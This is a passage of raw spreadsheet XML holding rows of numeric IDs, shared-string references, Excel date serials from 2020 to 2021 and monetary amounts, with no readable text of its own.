        <v>15000</v>
      </c>
      <c r="J2125" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="2126" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2126">
        <v>21713</v>
      </c>
      <c r="B2126">
        <v>701</v>
      </c>
      <c r="C2126" t="s">
        <v>1775</v>
      </c>
      <c r="D2126" t="s">
        <v>11576</v>
      </c>
      <c r="E2126">
        <v>11</v>
      </c>
      <c r="F2126" t="s">
        <v>4686</v>
      </c>
      <c r="G2126" s="1">
        <v>44210</v>
      </c>
      <c r="H2126">
        <v>10000</v>
      </c>
      <c r="J2126" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="2127" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2127">
        <v>21714</v>
      </c>
      <c r="B2127">
        <v>701</v>
      </c>
      <c r="C2127" t="s">
        <v>1775</v>
      </c>
      <c r="D2127" t="s">
        <v>11576</v>
      </c>
      <c r="E2127">
        <v>11</v>
      </c>
      <c r="F2127" t="s">
        <v>11578</v>
      </c>
      <c r="G2127" s="1">
        <v>44210</v>
      </c>
      <c r="H2127">
        <v>15000</v>
      </c>
      <c r="J2127" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="2128" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2128">
        <v>21715</v>
      </c>
      <c r="B2128">
        <v>701</v>
      </c>
      <c r="C2128" t="s">
        <v>1775</v>
      </c>
      <c r="D2128" t="s">
        <v>11576</v>
      </c>
      <c r="E2128">
        <v>11</v>
      </c>
      <c r="F2128" t="s">
        <v>9928</v>
      </c>
      <c r="G2128" s="1">
        <v>44210</v>
      </c>
      <c r="H2128">
        <v>15000</v>
      </c>
      <c r="J2128" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="2129" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2129">
        <v>21716</v>
      </c>
      <c r="B2129">
        <v>701</v>
      </c>
      <c r="C2129" t="s">
        <v>1775</v>
      </c>
      <c r="D2129" t="s">
        <v>11576</v>
      </c>
      <c r="E2129">
        <v>11</v>
      </c>
      <c r="F2129" t="s">
        <v>5434</v>
      </c>
      <c r="G2129" s="1">
        <v>44210</v>
      </c>
      <c r="H2129">
        <v>100000</v>
      </c>
      <c r="J2129" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2130" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2130">
        <v>21717</v>
      </c>
      <c r="B2130">
        <v>701</v>
      </c>
      <c r="C2130" t="s">
        <v>1775</v>
      </c>
      <c r="D2130" t="s">
        <v>11576</v>
      </c>
      <c r="E2130">
        <v>11</v>
      </c>
      <c r="F2130" t="s">
        <v>10387</v>
      </c>
      <c r="G2130" s="1">
        <v>44210</v>
      </c>
      <c r="H2130">
        <v>20000</v>
      </c>
      <c r="J2130" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="2131" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2131">
        <v>21718</v>
      </c>
      <c r="B2131">
        <v>701</v>
      </c>
      <c r="C2131" t="s">
        <v>1775</v>
      </c>
      <c r="D2131" t="s">
        <v>11576</v>
      </c>
      <c r="E2131">
        <v>11</v>
      </c>
      <c r="F2131" t="s">
        <v>11579</v>
      </c>
      <c r="G2131" s="1">
        <v>44210</v>
      </c>
      <c r="H2131">
        <v>30000</v>
      </c>
      <c r="J2131" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="2132" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2132">
        <v>21719</v>
      </c>
      <c r="B2132">
        <v>919</v>
      </c>
      <c r="C2132" t="s">
        <v>3339</v>
      </c>
      <c r="D2132" t="s">
        <v>11580</v>
      </c>
      <c r="E2132">
        <v>14</v>
      </c>
      <c r="F2132" t="s">
        <v>3341</v>
      </c>
      <c r="G2132" s="1">
        <v>44258</v>
      </c>
      <c r="H2132">
        <v>2400</v>
      </c>
      <c r="I2132" t="s">
        <v>11581</v>
      </c>
    </row>
    <row r="2133" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2133">
        <v>21720</v>
      </c>
      <c r="B2133">
        <v>4799</v>
      </c>
      <c r="C2133" t="s">
        <v>7335</v>
      </c>
      <c r="D2133" t="s">
        <v>11582</v>
      </c>
      <c r="E2133">
        <v>11</v>
      </c>
      <c r="F2133" t="s">
        <v>11344</v>
      </c>
      <c r="G2133" s="1">
        <v>44081</v>
      </c>
      <c r="H2133">
        <v>1000000</v>
      </c>
      <c r="I2133" t="s">
        <v>9436</v>
      </c>
    </row>
    <row r="2134" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2134">
        <v>21721</v>
      </c>
      <c r="B2134">
        <v>569</v>
      </c>
      <c r="C2134" t="s">
        <v>1663</v>
      </c>
      <c r="D2134" t="s">
        <v>11583</v>
      </c>
      <c r="E2134">
        <v>23</v>
      </c>
      <c r="F2134" t="s">
        <v>10346</v>
      </c>
      <c r="G2134" s="1">
        <v>44048</v>
      </c>
      <c r="H2134">
        <v>6000</v>
      </c>
      <c r="I2134" t="s">
        <v>10345</v>
      </c>
    </row>
    <row r="2135" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2135">
        <v>21722</v>
      </c>
      <c r="B2135">
        <v>408</v>
      </c>
      <c r="C2135" t="s">
        <v>457</v>
      </c>
      <c r="D2135" t="s">
        <v>10533</v>
      </c>
      <c r="E2135">
        <v>5</v>
      </c>
      <c r="F2135" t="s">
        <v>9453</v>
      </c>
      <c r="G2135" s="1">
        <v>44112</v>
      </c>
      <c r="H2135">
        <v>4000</v>
      </c>
      <c r="J2135" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2136" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2136">
        <v>21723</v>
      </c>
      <c r="B2136">
        <v>408</v>
      </c>
      <c r="C2136" t="s">
        <v>457</v>
      </c>
      <c r="D2136" t="s">
        <v>10533</v>
      </c>
      <c r="E2136">
        <v>5</v>
      </c>
      <c r="F2136" t="s">
        <v>547</v>
      </c>
      <c r="G2136" s="1">
        <v>44112</v>
      </c>
      <c r="H2136">
        <v>3000</v>
      </c>
      <c r="J2136" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2137" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2137">
        <v>21724</v>
      </c>
      <c r="B2137">
        <v>1946</v>
      </c>
      <c r="C2137" t="s">
        <v>16413</v>
      </c>
      <c r="D2137" t="s">
        <v>16414</v>
      </c>
      <c r="E2137">
        <v>19</v>
      </c>
      <c r="F2137" t="s">
        <v>6917</v>
      </c>
      <c r="G2137" s="1">
        <v>44090</v>
      </c>
      <c r="H2137" s="4">
        <v>200000</v>
      </c>
      <c r="I2137" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2138" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2138">
        <v>21725</v>
      </c>
      <c r="B2138">
        <v>1946</v>
      </c>
      <c r="C2138" t="s">
        <v>16413</v>
      </c>
      <c r="D2138" t="s">
        <v>16414</v>
      </c>
      <c r="E2138">
        <v>19</v>
      </c>
      <c r="F2138" t="s">
        <v>11515</v>
      </c>
      <c r="G2138" s="1">
        <v>44090</v>
      </c>
      <c r="H2138" s="4">
        <v>100000</v>
      </c>
      <c r="I2138" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2139" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2139">
        <v>21727</v>
      </c>
      <c r="B2139">
        <v>233</v>
      </c>
      <c r="C2139" t="s">
        <v>421</v>
      </c>
      <c r="D2139" t="s">
        <v>10086</v>
      </c>
      <c r="E2139">
        <v>16</v>
      </c>
      <c r="F2139" t="s">
        <v>11584</v>
      </c>
      <c r="G2139" s="1">
        <v>44081</v>
      </c>
      <c r="H2139">
        <v>1000000</v>
      </c>
      <c r="J2139" t="s">
        <v>11585</v>
      </c>
    </row>
    <row r="2140" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2140">
        <v>21728</v>
      </c>
      <c r="B2140">
        <v>233</v>
      </c>
      <c r="C2140" t="s">
        <v>421</v>
      </c>
      <c r="D2140" t="s">
        <v>10086</v>
      </c>
      <c r="E2140">
        <v>16</v>
      </c>
      <c r="F2140" t="s">
        <v>9437</v>
      </c>
      <c r="G2140" s="1">
        <v>44081</v>
      </c>
      <c r="H2140">
        <v>1000000</v>
      </c>
      <c r="J2140" t="s">
        <v>11585</v>
      </c>
    </row>
    <row r="2141" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2141">
        <v>21729</v>
      </c>
      <c r="B2141">
        <v>233</v>
      </c>
      <c r="C2141" t="s">
        <v>421</v>
      </c>
      <c r="D2141" t="s">
        <v>10086</v>
      </c>
      <c r="E2141">
        <v>16</v>
      </c>
      <c r="F2141" t="s">
        <v>11586</v>
      </c>
      <c r="G2141" s="1">
        <v>44081</v>
      </c>
      <c r="H2141">
        <v>3000000</v>
      </c>
      <c r="J2141" t="s">
        <v>11585</v>
      </c>
    </row>
    <row r="2142" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2142">
        <v>21730</v>
      </c>
      <c r="B2142">
        <v>233</v>
      </c>
      <c r="C2142" t="s">
        <v>421</v>
      </c>
      <c r="D2142" t="s">
        <v>10086</v>
      </c>
      <c r="E2142">
        <v>16</v>
      </c>
      <c r="F2142" t="s">
        <v>2236</v>
      </c>
      <c r="G2142" s="1">
        <v>44081</v>
      </c>
      <c r="H2142">
        <v>500000</v>
      </c>
      <c r="J2142" t="s">
        <v>11585</v>
      </c>
    </row>
    <row r="2143" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2143">
        <v>21731</v>
      </c>
      <c r="B2143">
        <v>233</v>
      </c>
      <c r="C2143" t="s">
        <v>421</v>
      </c>
      <c r="D2143" t="s">
        <v>10086</v>
      </c>
      <c r="E2143">
        <v>16</v>
      </c>
      <c r="F2143" t="s">
        <v>7241</v>
      </c>
      <c r="G2143" s="1">
        <v>44155</v>
      </c>
      <c r="H2143">
        <v>3000000</v>
      </c>
      <c r="J2143" t="s">
        <v>11585</v>
      </c>
    </row>
    <row r="2144" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2144">
        <v>21732</v>
      </c>
      <c r="B2144">
        <v>233</v>
      </c>
      <c r="C2144" t="s">
        <v>421</v>
      </c>
      <c r="D2144" t="s">
        <v>10086</v>
      </c>
      <c r="E2144">
        <v>16</v>
      </c>
      <c r="F2144" t="s">
        <v>1746</v>
      </c>
      <c r="G2144" s="1">
        <v>44081</v>
      </c>
      <c r="H2144">
        <v>100000</v>
      </c>
      <c r="J2144" t="s">
        <v>11585</v>
      </c>
    </row>
    <row r="2145" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2145">
        <v>21734</v>
      </c>
      <c r="B2145">
        <v>4839</v>
      </c>
      <c r="C2145" t="s">
        <v>16372</v>
      </c>
      <c r="D2145" t="s">
        <v>16415</v>
      </c>
      <c r="E2145">
        <v>12</v>
      </c>
      <c r="F2145" t="s">
        <v>11588</v>
      </c>
      <c r="G2145" s="1">
        <v>44071</v>
      </c>
      <c r="H2145">
        <v>4813.6400000000003</v>
      </c>
      <c r="I2145" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2146" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2146">
        <v>21735</v>
      </c>
      <c r="B2146">
        <v>4839</v>
      </c>
      <c r="C2146" t="s">
        <v>167</v>
      </c>
      <c r="D2146" t="s">
        <v>11587</v>
      </c>
      <c r="E2146">
        <v>12</v>
      </c>
      <c r="F2146" t="s">
        <v>11589</v>
      </c>
      <c r="G2146" s="1">
        <v>44071</v>
      </c>
      <c r="H2146">
        <v>5231</v>
      </c>
      <c r="I2146" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2147" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2147">
        <v>21736</v>
      </c>
      <c r="B2147">
        <v>4839</v>
      </c>
      <c r="C2147" t="s">
        <v>16372</v>
      </c>
      <c r="D2147" t="s">
        <v>16415</v>
      </c>
      <c r="E2147">
        <v>12</v>
      </c>
      <c r="F2147" t="s">
        <v>9676</v>
      </c>
      <c r="G2147" s="1">
        <v>44071</v>
      </c>
      <c r="H2147" s="3" t="s">
        <v>16250</v>
      </c>
      <c r="I2147" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2148" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2148">
        <v>21737</v>
      </c>
      <c r="B2148">
        <v>4839</v>
      </c>
      <c r="C2148" t="s">
        <v>16372</v>
      </c>
      <c r="D2148" t="s">
        <v>16415</v>
      </c>
      <c r="E2148">
        <v>12</v>
      </c>
      <c r="F2148" t="s">
        <v>9610</v>
      </c>
      <c r="G2148" s="1">
        <v>44071</v>
      </c>
      <c r="H2148" s="3" t="s">
        <v>16251</v>
      </c>
      <c r="I2148" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2149" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2149">
        <v>21738</v>
      </c>
      <c r="B2149">
        <v>4839</v>
      </c>
      <c r="C2149" t="s">
        <v>167</v>
      </c>
      <c r="D2149" t="s">
        <v>11587</v>
      </c>
      <c r="E2149">
        <v>12</v>
      </c>
      <c r="F2149" t="s">
        <v>11590</v>
      </c>
      <c r="G2149" s="1">
        <v>44071</v>
      </c>
      <c r="H2149">
        <v>0.27083333333333331</v>
      </c>
      <c r="I2149" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2150" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2150">
        <v>21739</v>
      </c>
      <c r="B2150">
        <v>4839</v>
      </c>
      <c r="C2150" t="s">
        <v>167</v>
      </c>
      <c r="D2150" t="s">
        <v>11587</v>
      </c>
      <c r="E2150">
        <v>12</v>
      </c>
      <c r="F2150" t="s">
        <v>11591</v>
      </c>
      <c r="G2150" s="1">
        <v>44071</v>
      </c>
      <c r="H2150">
        <v>0.27083333333333331</v>
      </c>
      <c r="I2150" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2151" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2151">
        <v>21740</v>
      </c>
      <c r="B2151">
        <v>4839</v>
      </c>
      <c r="C2151" t="s">
        <v>16372</v>
      </c>
      <c r="D2151" t="s">
        <v>16415</v>
      </c>
      <c r="E2151">
        <v>12</v>
      </c>
      <c r="F2151" t="s">
        <v>11592</v>
      </c>
      <c r="G2151" s="1">
        <v>44071</v>
      </c>
      <c r="H2151" s="3" t="s">
        <v>16252</v>
      </c>
      <c r="I2151" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2152" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2152">
        <v>21741</v>
      </c>
      <c r="B2152">
        <v>4839</v>
      </c>
      <c r="C2152" t="s">
        <v>167</v>
      </c>
      <c r="D2152" t="s">
        <v>11587</v>
      </c>
      <c r="E2152">
        <v>12</v>
      </c>
      <c r="F2152" t="s">
        <v>11593</v>
      </c>
      <c r="G2152" s="1">
        <v>44071</v>
      </c>
      <c r="H2152">
        <v>1200</v>
      </c>
      <c r="I2152" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2153" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2153">
        <v>21742</v>
      </c>
      <c r="B2153">
        <v>4839</v>
      </c>
      <c r="C2153" t="s">
        <v>16372</v>
      </c>
      <c r="D2153" t="s">
        <v>16415</v>
      </c>
      <c r="E2153">
        <v>12</v>
      </c>
      <c r="F2153" t="s">
        <v>9928</v>
      </c>
      <c r="G2153" s="1">
        <v>44071</v>
      </c>
      <c r="H2153" s="3" t="s">
        <v>16253</v>
      </c>
      <c r="I2153" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2154" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2154">
        <v>21743</v>
      </c>
      <c r="B2154">
        <v>4839</v>
      </c>
      <c r="C2154" t="s">
        <v>16372</v>
      </c>
      <c r="D2154" t="s">
        <v>16415</v>
      </c>
      <c r="E2154">
        <v>12</v>
      </c>
      <c r="F2154" t="s">
        <v>9595</v>
      </c>
      <c r="G2154" s="1">
        <v>44071</v>
      </c>
      <c r="H2154" s="3" t="s">
        <v>16254</v>
      </c>
      <c r="I2154" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2155" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2155">
        <v>21744</v>
      </c>
      <c r="B2155">
        <v>4839</v>
      </c>
      <c r="C2155" t="s">
        <v>16372</v>
      </c>
      <c r="D2155" t="s">
        <v>16415</v>
      </c>
      <c r="E2155">
        <v>12</v>
      </c>
      <c r="F2155" t="s">
        <v>9577</v>
      </c>
      <c r="G2155" s="1">
        <v>44071</v>
      </c>
      <c r="H2155">
        <v>2146.7800000000002</v>
      </c>
      <c r="I2155" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2156" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2156">
        <v>21745</v>
      </c>
      <c r="B2156">
        <v>4839</v>
      </c>
      <c r="C2156" t="s">
        <v>16372</v>
      </c>
      <c r="D2156" t="s">
        <v>16415</v>
      </c>
      <c r="E2156">
        <v>12</v>
      </c>
      <c r="F2156" t="s">
        <v>9435</v>
      </c>
      <c r="G2156" s="1">
        <v>44071</v>
      </c>
      <c r="H2156" s="2" t="s">
        <v>16255</v>
      </c>
      <c r="I2156" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2157" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2157">
        <v>21748</v>
      </c>
      <c r="B2157">
        <v>4839</v>
      </c>
      <c r="C2157" t="s">
        <v>16372</v>
      </c>
      <c r="D2157" t="s">
        <v>16415</v>
      </c>
      <c r="E2157">
        <v>12</v>
      </c>
      <c r="F2157" t="s">
        <v>11215</v>
      </c>
      <c r="G2157" s="1">
        <v>44071</v>
      </c>
      <c r="H2157" s="3" t="s">
        <v>16256</v>
      </c>
      <c r="I2157" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2158" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2158">
        <v>21749</v>
      </c>
      <c r="B2158">
        <v>4839</v>
      </c>
      <c r="C2158" t="s">
        <v>16372</v>
      </c>
      <c r="D2158" t="s">
        <v>16415</v>
      </c>
      <c r="E2158">
        <v>12</v>
      </c>
      <c r="F2158" t="s">
        <v>9460</v>
      </c>
      <c r="G2158" s="1">
        <v>44071</v>
      </c>
      <c r="H2158" s="3" t="s">
        <v>16257</v>
      </c>
      <c r="I2158" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2159" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2159">
        <v>21750</v>
      </c>
      <c r="B2159">
        <v>4839</v>
      </c>
      <c r="C2159" t="s">
        <v>16372</v>
      </c>
      <c r="D2159" t="s">
        <v>16415</v>
      </c>
      <c r="E2159">
        <v>12</v>
      </c>
      <c r="F2159" t="s">
        <v>2924</v>
      </c>
      <c r="G2159" s="1">
        <v>44071</v>
      </c>
      <c r="H2159">
        <v>97959.03</v>
      </c>
      <c r="I2159" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2160" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2160">
        <v>21751</v>
      </c>
      <c r="B2160">
        <v>4839</v>
      </c>
      <c r="C2160" t="s">
        <v>16372</v>
      </c>
      <c r="D2160" t="s">
        <v>16415</v>
      </c>
      <c r="E2160">
        <v>12</v>
      </c>
      <c r="F2160" t="s">
        <v>9438</v>
      </c>
      <c r="G2160" s="1">
        <v>44071</v>
      </c>
      <c r="H2160">
        <v>99776.03</v>
      </c>
      <c r="I2160" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2161" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2161">
        <v>21752</v>
      </c>
      <c r="B2161">
        <v>4839</v>
      </c>
      <c r="C2161" t="s">
        <v>16372</v>
      </c>
      <c r="D2161" t="s">
        <v>16415</v>
      </c>
      <c r="E2161">
        <v>12</v>
      </c>
      <c r="F2161" t="s">
        <v>4686</v>
      </c>
      <c r="G2161" s="1">
        <v>44071</v>
      </c>
      <c r="H2161">
        <v>866.9</v>
      </c>
      <c r="I2161" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2162" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2162">
        <v>21753</v>
      </c>
      <c r="B2162">
        <v>4839</v>
      </c>
      <c r="C2162" t="s">
        <v>16372</v>
      </c>
      <c r="D2162" t="s">
        <v>16415</v>
      </c>
      <c r="E2162">
        <v>12</v>
      </c>
      <c r="F2162" t="s">
        <v>2236</v>
      </c>
      <c r="G2162" s="1">
        <v>44071</v>
      </c>
      <c r="H2162">
        <v>1057.7</v>
      </c>
      <c r="I2162" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2163" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2163">
        <v>21754</v>
      </c>
      <c r="B2163">
        <v>4839</v>
      </c>
      <c r="C2163" t="s">
        <v>16372</v>
      </c>
      <c r="D2163" t="s">
        <v>16415</v>
      </c>
      <c r="E2163">
        <v>12</v>
      </c>
      <c r="F2163" t="s">
        <v>3814</v>
      </c>
      <c r="G2163" s="1">
        <v>44071</v>
      </c>
      <c r="H2163">
        <v>1205.7</v>
      </c>
      <c r="I2163" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2164" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2164">
        <v>21755</v>
      </c>
      <c r="B2164">
        <v>4839</v>
      </c>
      <c r="C2164" t="s">
        <v>167</v>
      </c>
      <c r="D2164" t="s">
        <v>11587</v>
      </c>
      <c r="E2164">
        <v>12</v>
      </c>
      <c r="F2164" t="s">
        <v>1746</v>
      </c>
      <c r="G2164" s="1">
        <v>44071</v>
      </c>
      <c r="H2164">
        <v>1050</v>
      </c>
      <c r="I2164" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2165" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2165">
        <v>21756</v>
      </c>
      <c r="B2165">
        <v>4839</v>
      </c>
      <c r="C2165" t="s">
        <v>16372</v>
      </c>
      <c r="D2165" t="s">
        <v>16415</v>
      </c>
      <c r="E2165">
        <v>12</v>
      </c>
      <c r="F2165" t="s">
        <v>9430</v>
      </c>
      <c r="G2165" s="1">
        <v>44071</v>
      </c>
      <c r="H2165" s="3" t="s">
        <v>16242</v>
      </c>
      <c r="I2165" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2166" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2166">
        <v>21780</v>
      </c>
      <c r="B2166">
        <v>2068</v>
      </c>
      <c r="C2166" t="s">
        <v>4780</v>
      </c>
      <c r="D2166" t="s">
        <v>9856</v>
      </c>
      <c r="E2166">
        <v>16</v>
      </c>
      <c r="F2166" t="s">
        <v>9722</v>
      </c>
      <c r="G2166" s="1">
        <v>44095</v>
      </c>
      <c r="H2166">
        <v>36500</v>
      </c>
      <c r="I2166" t="s">
        <v>11594</v>
      </c>
      <c r="J2166" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2167" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2167">
        <v>21781</v>
      </c>
      <c r="B2167">
        <v>2068</v>
      </c>
      <c r="C2167" t="s">
        <v>4780</v>
      </c>
      <c r="D2167" t="s">
        <v>9856</v>
      </c>
      <c r="E2167">
        <v>16</v>
      </c>
      <c r="F2167" t="s">
        <v>10130</v>
      </c>
      <c r="G2167" s="1">
        <v>44095</v>
      </c>
      <c r="H2167">
        <v>36500</v>
      </c>
      <c r="I2167" t="s">
        <v>11594</v>
      </c>
      <c r="J2167" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2168" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2168">
        <v>21785</v>
      </c>
      <c r="B2168">
        <v>2068</v>
      </c>
      <c r="C2168" t="s">
        <v>4780</v>
      </c>
      <c r="D2168" t="s">
        <v>9856</v>
      </c>
      <c r="E2168">
        <v>16</v>
      </c>
      <c r="F2168" t="s">
        <v>1746</v>
      </c>
      <c r="G2168" s="1">
        <v>44095</v>
      </c>
      <c r="H2168">
        <v>36500</v>
      </c>
      <c r="I2168" t="s">
        <v>11595</v>
      </c>
      <c r="J2168" t="s">
        <v>11596</v>
      </c>
    </row>
    <row r="2169" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2169">
        <v>21786</v>
      </c>
      <c r="B2169">
        <v>2068</v>
      </c>
      <c r="C2169" t="s">
        <v>4780</v>
      </c>
      <c r="D2169" t="s">
        <v>9856</v>
      </c>
      <c r="E2169">
        <v>16</v>
      </c>
      <c r="F2169" t="s">
        <v>9523</v>
      </c>
      <c r="G2169" s="1">
        <v>44095</v>
      </c>
      <c r="H2169">
        <v>36500</v>
      </c>
      <c r="I2169" t="s">
        <v>11597</v>
      </c>
      <c r="J2169" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2170" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2170">
        <v>21787</v>
      </c>
      <c r="B2170">
        <v>2068</v>
      </c>
      <c r="C2170" t="s">
        <v>4780</v>
      </c>
      <c r="D2170" t="s">
        <v>9856</v>
      </c>
      <c r="E2170">
        <v>16</v>
      </c>
      <c r="F2170" t="s">
        <v>9435</v>
      </c>
      <c r="G2170" s="1">
        <v>44095</v>
      </c>
      <c r="H2170">
        <v>36500</v>
      </c>
      <c r="I2170" t="s">
        <v>11598</v>
      </c>
      <c r="J2170" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2171" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2171">
        <v>21789</v>
      </c>
      <c r="B2171">
        <v>4774</v>
      </c>
      <c r="C2171" t="s">
        <v>7012</v>
      </c>
      <c r="D2171" t="s">
        <v>11599</v>
      </c>
      <c r="E2171">
        <v>16</v>
      </c>
      <c r="F2171" t="s">
        <v>385</v>
      </c>
      <c r="G2171" s="1">
        <v>44105</v>
      </c>
      <c r="H2171">
        <v>640000</v>
      </c>
      <c r="J2171" t="s">
        <v>11600</v>
      </c>
    </row>
    <row r="2172" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2172">
        <v>21790</v>
      </c>
      <c r="B2172">
        <v>4774</v>
      </c>
      <c r="C2172" t="s">
        <v>7012</v>
      </c>
      <c r="D2172" t="s">
        <v>11599</v>
      </c>
      <c r="E2172">
        <v>16</v>
      </c>
      <c r="F2172" t="s">
        <v>7901</v>
      </c>
      <c r="G2172" s="1">
        <v>44105</v>
      </c>
      <c r="H2172">
        <v>785000</v>
      </c>
      <c r="J2172" t="s">
        <v>9905</v>
      </c>
    </row>
    <row r="2173" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2173">
        <v>21791</v>
      </c>
      <c r="B2173">
        <v>4774</v>
      </c>
      <c r="C2173" t="s">
        <v>7012</v>
      </c>
      <c r="D2173" t="s">
        <v>11599</v>
      </c>
      <c r="E2173">
        <v>16</v>
      </c>
      <c r="F2173" t="s">
        <v>11601</v>
      </c>
      <c r="G2173" s="1">
        <v>44105</v>
      </c>
      <c r="H2173">
        <v>208000</v>
      </c>
      <c r="J2173" t="s">
        <v>10151</v>
      </c>
    </row>
    <row r="2174" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2174">
        <v>21792</v>
      </c>
      <c r="B2174">
        <v>4774</v>
      </c>
      <c r="C2174" t="s">
        <v>7012</v>
      </c>
      <c r="D2174" t="s">
        <v>11599</v>
      </c>
      <c r="E2174">
        <v>16</v>
      </c>
      <c r="F2174" t="s">
        <v>11602</v>
      </c>
      <c r="G2174" s="1">
        <v>44105</v>
      </c>
      <c r="H2174">
        <v>100000</v>
      </c>
      <c r="J2174" t="s">
        <v>10151</v>
      </c>
    </row>
    <row r="2175" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2175">
        <v>21793</v>
      </c>
      <c r="B2175">
        <v>4774</v>
      </c>
      <c r="C2175" t="s">
        <v>7012</v>
      </c>
      <c r="D2175" t="s">
        <v>11599</v>
      </c>
      <c r="E2175">
        <v>16</v>
      </c>
      <c r="F2175" t="s">
        <v>1030</v>
      </c>
      <c r="G2175" s="1">
        <v>44105</v>
      </c>
      <c r="H2175">
        <v>30000</v>
      </c>
      <c r="J2175" t="s">
        <v>11603</v>
      </c>
    </row>
    <row r="2176" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2176">
        <v>21794</v>
      </c>
      <c r="B2176">
        <v>930</v>
      </c>
      <c r="C2176" t="s">
        <v>3362</v>
      </c>
      <c r="D2176" t="s">
        <v>11604</v>
      </c>
      <c r="E2176">
        <v>1</v>
      </c>
      <c r="F2176" t="s">
        <v>4686</v>
      </c>
      <c r="G2176" s="1">
        <v>44165</v>
      </c>
      <c r="H2176">
        <v>50000</v>
      </c>
      <c r="J2176" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2177" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2177">
        <v>21795</v>
      </c>
      <c r="B2177">
        <v>930</v>
      </c>
      <c r="C2177" t="s">
        <v>3362</v>
      </c>
      <c r="D2177" t="s">
        <v>11604</v>
      </c>
      <c r="E2177">
        <v>1</v>
      </c>
      <c r="F2177" t="s">
        <v>2236</v>
      </c>
      <c r="G2177" s="1">
        <v>44165</v>
      </c>
      <c r="H2177">
        <v>100000</v>
      </c>
      <c r="J2177" t="s">
        <v>10331</v>
      </c>
    </row>
    <row r="2178" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2178">
        <v>21796</v>
      </c>
      <c r="B2178">
        <v>930</v>
      </c>
      <c r="C2178" t="s">
        <v>3362</v>
      </c>
      <c r="D2178" t="s">
        <v>11604</v>
      </c>
      <c r="E2178">
        <v>1</v>
